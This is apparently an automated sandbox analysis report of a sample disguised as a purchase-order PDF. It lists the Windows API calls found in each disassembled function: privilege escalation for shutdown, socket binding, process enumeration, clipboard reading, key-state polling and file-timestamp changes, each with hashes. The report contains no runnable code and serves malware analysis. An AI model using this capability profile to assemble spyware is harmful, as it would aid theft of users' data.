                                                                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                            • API String ID: 1588287285-2785691316
                                                                                                                                                                                                                                                                                                            • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                                                                                                                                                            • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00436504
                                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                                                                                                                                                                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                                                                                                                                                                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
• Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
• Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
• Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
APIs
• __swprintf.LIBCMT ref: 00436162
• __swprintf.LIBCMT ref: 00436176
  • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
• __wcsicoll.LIBCMT ref: 00436185
• FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
• LoadResource.KERNEL32(?,00000000), ref: 004361AE
• LockResource.KERNEL32(00000000), ref: 004361B5
• FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
• LoadResource.KERNEL32(?,00000000), ref: 004361E4
• SizeofResource.KERNEL32(?,00000000), ref: 004361F0
• LockResource.KERNEL32(?), ref: 004361FD
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
• String ID:
• API String ID: 2406429042-0
• Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
• Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
• Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
• Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D522
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
• GetLastError.KERNEL32 ref: 0045D59D
• SetErrorMode.KERNEL32(?), ref: 0045D629
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
• Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
• Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
• Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
APIs
• MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
• OleInitialize.OLE32(00000000), ref: 0047AE06
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcslen.LIBCMT ref: 0047AE18
• CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
• CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
• GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
• String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 1915432386-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: DEFINE$`$h$h
                                                                                                                                                                                                                                                                                                            • API String ID: 0-4194577831
                                                                                                                                                                                                                                                                                                            • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                                                                                                                                                            • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2609815416-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                            • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 004370BA
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 2547909840-0
• Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
• Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
• Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
• Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
• Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
• FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
• FindClose.KERNEL32(?,?,00000000), ref: 004522C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Find$File$CloseFirstNextSleep_wcslen
• String ID: *.*
• API String ID: 2693929171-438819550
• Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
• Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
• Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
• Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
APIs
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
• String ID: HH
• API String ID: 589737431-2761332787
• Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
• Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
• Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
• Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
APIs
• __wcsicoll.LIBCMT ref: 0043643C
• mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
• __wcsicoll.LIBCMT ref: 00436466
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __wcsicollmouse_event
• String ID: DOWN
• API String ID: 1033544147-711622031
• Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
• Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
• Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
• Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
APIs
  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
• socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
• WSAGetLastError.WSOCK32(00000000), ref: 00474233
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ErrorLastinet_addrsocket
• String ID:
• API String ID: 4170576061-0
• Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
• Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
• Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
• Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
APIs
• GetCursorPos.USER32(004A83D8), ref: 0045636A
• ScreenToClient.USER32(004A83D8,?), ref: 0045638A
• GetAsyncKeyState.USER32(?), ref: 004563D0
• GetAsyncKeyState.USER32(?), ref: 004563DC
• GetWindowLongW.USER32(?,000000F0), ref: 00456430
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
• Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
• Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
• Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
• Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• IsWindowVisible.USER32 ref: 00477314
• IsWindowEnabled.USER32 ref: 00477324
• GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
• IsIconic.USER32 ref: 0047733F
• IsZoomed.USER32 ref: 0047734D
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
• Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
• Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
• Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
APIs
• CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
• SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
